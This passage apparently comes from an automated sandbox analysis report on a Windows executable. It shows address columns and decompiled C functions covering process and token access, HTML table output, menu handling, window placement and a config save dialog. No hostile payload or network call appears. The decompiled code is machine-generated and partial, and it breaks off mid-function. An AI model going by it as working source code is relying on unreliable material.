                                                                                                                                                                                                                          0x00405a2e
                                                                                                                                                                                                                          0x00405a3c
                                                                                                                                                                                                                          0x00405a40
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405a42
                                                                                                                                                                                                                          0x00405a42
                                                                                                                                                                                                                          0x00405a54
                                                                                                                                                                                                                          0x00405a59
                                                                                                                                                                                                                          0x00405a5a
                                                                                                                                                                                                                          0x00405a5a
                                                                                                                                                                                                                          0x00405a61
                                                                                                                                                                                                                          0x00405a69
                                                                                                                                                                                                                          0x00405a7f
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405a69
                                                                                                                                                                                                                          0x00405a05
                                                                                                                                                                                                                          0x00405a0e
                                                                                                                                                                                                                          0x00405a17
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405a19
                                                                                                                                                                                                                          0x00405a19
                                                                                                                                                                                                                          0x00405a1c
                                                                                                                                                                                                                          0x00405a1d
                                                                                                                                                                                                                          0x00405a20
                                                                                                                                                                                                                          0x00405a29
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405a29
                                                                                                                                                                                                                          0x00405a17
                                                                                                                                                                                                                          0x00405a03
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405a6b
                                                                                                                                                                                                                          0x00405a6e
                                                                                                                                                                                                                          0x00405a72
                                                                                                                                                                                                                          0x00405a72
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004059d4
                                                                                                                                                                                                                          0x00405a81
                                                                                                                                                                                                                          0x00405a84
                                                                                                                                                                                                                          0x00405a8f

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004059B5
                                                                                                                                                                                                                            • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                                                                                                                            • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                                                                                                                            • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                                                                                                                            • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                                                                                                                            • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                                                                                                                            • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                                                                                                                            • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                                                                                                                            • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                                                                                                                            • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                                                                                                                            • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                                                                                                                            • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                                                                                                                            • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00405A0E
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 768606695-0
                                                                                                                                                                                                                          • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                                                                                                                          • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                                                                                                                                          0x00407639
                                                                                                                                                                                                                          0x00407646
                                                                                                                                                                                                                          0x00407647
                                                                                                                                                                                                                          0x00407654
                                                                                                                                                                                                                          0x0040765f
                                                                                                                                                                                                                          0x0040765f
                                                                                                                                                                                                                          0x0040766b
                                                                                                                                                                                                                          0x0040766d
                                                                                                                                                                                                                          0x00407672
                                                                                                                                                                                                                          0x00407677
                                                                                                                                                                                                                          0x0040767d
                                                                                                                                                                                                                          0x00407680
                                                                                                                                                                                                                          0x00407686
                                                                                                                                                                                                                          0x00407691
                                                                                                                                                                                                                          0x00407697
                                                                                                                                                                                                                          0x00407699
                                                                                                                                                                                                                          0x00407699
                                                                                                                                                                                                                          0x0040769c
                                                                                                                                                                                                                          0x0040769f
                                                                                                                                                                                                                          0x004076a3
                                                                                                                                                                                                                          0x004076a7
                                                                                                                                                                                                                          0x004076ab
                                                                                                                                                                                                                          0x004076b5
                                                                                                                                                                                                                          0x004076be
                                                                                                                                                                                                                          0x004076c8
                                                                                                                                                                                                                          0x004076de
                                                                                                                                                                                                                          0x004076ee
                                                                                                                                                                                                                          0x004076f1
                                                                                                                                                                                                                          0x004076f4
                                                                                                                                                                                                                          0x004076fa
                                                                                                                                                                                                                          0x00407708
                                                                                                                                                                                                                          0x0040770e
                                                                                                                                                                                                                          0x00407718
                                                                                                                                                                                                                          0x0040771d
                                                                                                                                                                                                                          0x00407723
                                                                                                                                                                                                                          0x00407724
                                                                                                                                                                                                                          0x00407727
                                                                                                                                                                                                                          0x0040772c
                                                                                                                                                                                                                          0x0040772f
                                                                                                                                                                                                                          0x00407734
                                                                                                                                                                                                                          0x0040773f
                                                                                                                                                                                                                          0x00407744
                                                                                                                                                                                                                          0x00407745
                                                                                                                                                                                                                          0x0040767d
                                                                                                                                                                                                                          0x00407760

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfwcscat
                                                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                          • API String ID: 384018552-4153097237
                                                                                                                                                                                                                          • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                                                                                                                          • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                                                          			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                                                                                                                          0x0040605e
                                                                                                                                                                                                                          0x00406061
                                                                                                                                                                                                                          0x00406069
                                                                                                                                                                                                                          0x00406074
                                                                                                                                                                                                                          0x0040607a
                                                                                                                                                                                                                          0x0040607e
                                                                                                                                                                                                                          0x00406082
                                                                                                                                                                                                                          0x00406148
                                                                                                                                                                                                                          0x0040614e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00406088
                                                                                                                                                                                                                          0x00406088
                                                                                                                                                                                                                          0x00406093
                                                                                                                                                                                                                          0x00406098
                                                                                                                                                                                                                          0x0040609f
                                                                                                                                                                                                                          0x004060ae
                                                                                                                                                                                                                          0x004060b6
                                                                                                                                                                                                                          0x004060be
                                                                                                                                                                                                                          0x004060c6
                                                                                                                                                                                                                          0x004060ca
                                                                                                                                                                                                                          0x004060cf
                                                                                                                                                                                                                          0x004060d7
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004060de
                                                                                                                                                                                                                          0x00406129
                                                                                                                                                                                                                          0x00406129
                                                                                                                                                                                                                          0x0040612d
                                                                                                                                                                                                                          0x0040612f
                                                                                                                                                                                                                          0x00406130
                                                                                                                                                                                                                          0x00406134
                                                                                                                                                                                                                          0x00406137
                                                                                                                                                                                                                          0x0040613c
                                                                                                                                                                                                                          0x0040613c
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040612d
                                                                                                                                                                                                                          0x004060e7
                                                                                                                                                                                                                          0x004060f0
                                                                                                                                                                                                                          0x004060f2
                                                                                                                                                                                                                          0x004060f2
                                                                                                                                                                                                                          0x004060f9
                                                                                                                                                                                                                          0x004060fd
                                                                                                                                                                                                                          0x00406102
                                                                                                                                                                                                                          0x0040610c
                                                                                                                                                                                                                          0x00406112
                                                                                                                                                                                                                          0x00406117
                                                                                                                                                                                                                          0x00406117
                                                                                                                                                                                                                          0x00406104
                                                                                                                                                                                                                          0x00406104
                                                                                                                                                                                                                          0x00406104
                                                                                                                                                                                                                          0x00406104
                                                                                                                                                                                                                          0x00406102
                                                                                                                                                                                                                          0x00406122
                                                                                                                                                                                                                          0x00406128
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040613f
                                                                                                                                                                                                                          0x0040613f
                                                                                                                                                                                                                          0x00406140
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                          • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                                                                                                                          • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                          			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                                                                                                                                                          0x00402bee
                                                                                                                                                                                                                          0x00402bf8
                                                                                                                                                                                                                          0x00402cae
                                                                                                                                                                                                                          0x00402c08
                                                                                                                                                                                                                          0x00402c10
                                                                                                                                                                                                                          0x00402c11
                                                                                                                                                                                                                          0x00402c12
                                                                                                                                                                                                                          0x00402c13
                                                                                                                                                                                                                          0x00402c20
                                                                                                                                                                                                                          0x00402c27
                                                                                                                                                                                                                          0x00402c2e
                                                                                                                                                                                                                          0x00402c30
                                                                                                                                                                                                                          0x00402c37
                                                                                                                                                                                                                          0x00402c4b
                                                                                                                                                                                                                          0x00402c50
                                                                                                                                                                                                                          0x00402c53
                                                                                                                                                                                                                          0x00402c55
                                                                                                                                                                                                                          0x00402c3e
                                                                                                                                                                                                                          0x00402c3e
                                                                                                                                                                                                                          0x00402c41
                                                                                                                                                                                                                          0x00402c41
                                                                                                                                                                                                                          0x00402c5a
                                                                                                                                                                                                                          0x00402c60
                                                                                                                                                                                                                          0x00402c65
                                                                                                                                                                                                                          0x00402c68
                                                                                                                                                                                                                          0x00402c6d
                                                                                                                                                                                                                          0x00402c77
                                                                                                                                                                                                                          0x00402c7c
                                                                                                                                                                                                                          0x00402c7e
                                                                                                                                                                                                                          0x00402c87
                                                                                                                                                                                                                          0x00402ca5
                                                                                                                                                                                                                          0x00402ca5
                                                                                                                                                                                                                          0x00402c87
                                                                                                                                                                                                                          0x00402c7c
                                                                                                                                                                                                                          0x00402c6d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402cac

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsSystem$Window
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1155976603-0
                                                                                                                                                                                                                          • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                                                                                                                          • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                                                                                                                                          0x004036ef
                                                                                                                                                                                                                          0x004036f6
                                                                                                                                                                                                                          0x0040370b
                                                                                                                                                                                                                          0x00403712
                                                                                                                                                                                                                          0x00403717
                                                                                                                                                                                                                          0x0040371c
                                                                                                                                                                                                                          0x0040371f
                                                                                                                                                                                                                          0x0040372c
                                                                                                                                                                                                                          0x00403735
                                                                                                                                                                                                                          0x00403738
                                                                                                                                                                                                                          0x00403744
                                                                                                                                                                                                                          0x00403751
                                                                                                                                                                                                                          0x00403758
                                                                                                                                                                                                                          0x00403760
                                                                                                                                                                                                                          0x00403769
                                                                                                                                                                                                                          0x0040376c
                                                                                                                                                                                                                          0x00403778
                                                                                                                                                                                                                          0x0040377b
                                                                                                                                                                                                                          0x0040378b
                                                                                                                                                                                                                          0x00403792
                                                                                                                                                                                                                          0x00403795
                                                                                                                                                                                                                          0x00403798
                                                                                                                                                                                                                          0x0040379b
                                                                                                                                                                                                                          0x004037a2
                                                                                                                                                                                                                          0x004037a5
                                                                                                                                                                                                                          0x004037a8
                                                                                                                                                                                                                          0x004037af
                                                                                                                                                                                                                          0x004037b7
                                                                                                                                                                                                                          0x004037c3
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004037d4
                                                                                                                                                                                                                          0x004037dc

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004036F6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403712
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                            • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                            • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                            • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                                                                                                                            • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                                                                                                                            • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                                                                                                                            • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                                                                                                                            • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                                                                                                                            • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                                                                                                                          • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004037C3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                                                                                          • String ID: L$cfg
                                                                                                                                                                                                                          • API String ID: 275899518-3734058911
                                                                                                                                                                                                                          • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                                                                                                                          • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
